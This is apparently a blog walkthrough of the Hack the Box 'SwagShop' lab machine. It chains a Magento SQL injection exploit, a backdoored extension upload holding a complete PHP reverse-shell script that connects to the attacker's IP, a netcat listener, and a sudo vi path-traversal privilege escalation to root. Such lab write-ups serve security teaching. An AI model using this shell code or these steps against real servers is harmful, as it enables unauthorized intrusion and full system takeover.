2 min read

Hack the Box - Swagshop

Hi there, this is SwagShop machine walkthrough. An easy box with poor connection 😒 and always got reset by other users. Once we get root on this box, we can try the Beta version of Hack the Box Store 😎.

Information

  • OS: Linux
  • IP: 10.10.10.140
  • Difficulty: Easy

Enumeration

First, let's start start with nmap scan for the opened ports.

# nmap -sV -sC -A -Pn 10.10.10.140
Starting Nmap 7.30 ( https://nmap.org ) at 2019-06-04 15:55 KST
Nmap scan report for 10.10.10.140
Host is up (0.29s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
|_  256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home page
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.17 seconds

The SSH service is running, but I don't have any login information. So, let see what port 80 does. It is a webpage with titled Magento. I googled Magento and it is a eCommerce plateform using PHP.

SwagShop Magento

Magento SQL Injection Vulnerability

I start search for magento vulnerability on google and the first thing that come frist is SQL Injection effect to some version of Magento.

Hmmm... I didn't check the version of Magento but I still try searching google for magento sql injection exploit db.

Yeah, the first result from google is interesting. I try using the exploit code from Exploit-DB by downloading and modify some code by changing the target as below.

target = "http://10.10.10.140/index.php"

And run the code.

# python 37977.py
WORKED
Check http://10.10.10.140/index.php/admin with creds forme:forme

The SQL Injection script does works. So now I try login with the username forme and password forme and it goes in to the admin panel.

Magento Admin panel

Shell Uploading

Normally, after login to the dashboard, I usually find for the place for uploading file or shell. But Magento dashboard is new to me so I do some more googling for help xD.

After search for magento uplaod shell and see some video on YouTube, I can find a place to upload file by go in to http://10.10.10.140/downloader and login with the previous user and password. I try to uplaod PHP shell directly but it doesn't allow since it accepts only the package file.

Magento file upload

So, I search for magento shell and I found this one LINK. Since they provided the source code, so we can put the reverse shell code inside the php file (it's may easier lol).

I modify the IndexController.php file inside Backdoor Code/app/code/community/Lavalamp/Connector/controllers/ by adding reverse shell script as follow.

<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = 'my_ip_address';
$port = 1234;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
if (function_exists('pcntl_fork')) {
	$pid = pcntl_fork();
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	if ($pid) {
		exit(0);  // Parent exits
	}
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}
	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}
chdir("/");
umask(0);
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}
	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}
	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}
	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
    }
	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
function printit ($string) {
	if (!$daemon) {
		print "$string\n";
	}
}
class Lavalamp_Connector_IndexController extends Mage_Core_Controller_Front_Action
{
    public function indexAction()
    {
        echo "<h1>Ehhh xD</h1>";
    }
}
?>

After modifying, I simply follow the README.md instruction to re-packaging the files.

cd Backdoor\ Code
tar -czvf xd.tgz app package.xml skin
mv bd.tgz ..

So now I can upload the reverse shell to the server,

Get access to the machine

On my machine, I run netcat -lvnp 1234 as the reverse shell listener. Then just open the uploaded reverse shell by the link http://10.10.10.140/index.php/lavalamp/index.

Now I'm in the machine as www-data user.

$ netcat -lvnp 1234                                                                                                                         Chhaileng@Chhailengs-MacBook-Pro
Connection from 10.10.10.140:54626
Linux swagshop 4.4.0-146-generic #172-Ubuntu SMP Wed Apr 3 09:00:08 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 04:13:14 up 0 min,  0 users,  load average: 0.29, 0.08, 0.02
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@swagshop:/$ ls /home
haris
www-data@swagshop:/$ cd /home/haris
www-data@swagshop:/home/haris$ ls -l
-rw-r--r-- 1 haris haris 33 May  8 09:01 user.txt
www-data@swagshop:/home/haris$ cat user.txt
a4****************************c8

Root

I start with searching for exploit of the kernel but it seems like it doesn't work.

www-data@swagshop:/home/haris$ uname -a
Linux swagshop 4.4.0-146-generic #172-Ubuntu SMP Wed Apr 3 09:00:08 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

I try a lot of methods but it doesn't work. @@ Finally, after searching for help on google, I run sudo -l and see some interesting information.

www-data@swagshop:/home/haris$ sudo -l
Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*
www-data@swagshop:/home/haris$ 

As I see is, user www-data can run the command vi and anything in /var/www/html. So, I start run the command sudo vi but it prompts for the password input. Later I try with using full path of vi. But it stills asking for password. This time I try using full path of allowed directory /var/www/html.

www-data@swagshop:/home/haris$ sudo /usr/bin/vi /var/www/html/test.txt

It works. I have created a file name test.txt as root user.

www-data@swagshop:/var/www/html$ ls -l | grep test
-rw-r--r--  1 root     root          5 Jun  4 04:31 test.txt

Since I see the permission is allowed for /var/www/html/* which mean everying inside that directory. I try using ../ to exit to the / directory and go for viewing /root/root.txt.

www-data@swagshop:/var/www/html$ sudo /usr/bin/vi /var/www/html/../../../root/root.txt

Now I got the root flag xD

c2****************************21

   ___ ___
 /| |/|\| |\
/_| ´ |.` |_\           We are open! (Almost)
  |   |.  |
  |   |.  |         Join the beta HTB Swag Store!
  |___|.__|       https://hackthebox.store/password

                   PS: Use root flag as password!
~
~
"/var/www/html/../../../root/root.txt" 10L, 270C              1,1           All

If you want a tty root shell, just type : !sh (like you use :q to exit vi).

~
~
:!sh
# id
uid=0(root) gid=0(root) groups=0(root)
# python3 -c "import pty;pty.spawn('/bin/bash')"
root@swagshop:/var/www/html# 

Rooted, now let's go to the SwagShop and explore some stuff xD

I ordered a t-shirt from SwagShop. By using root flag, I got free shipping from HTB Store and here it arrived...

HTB T-shirt

SHARE THIS POST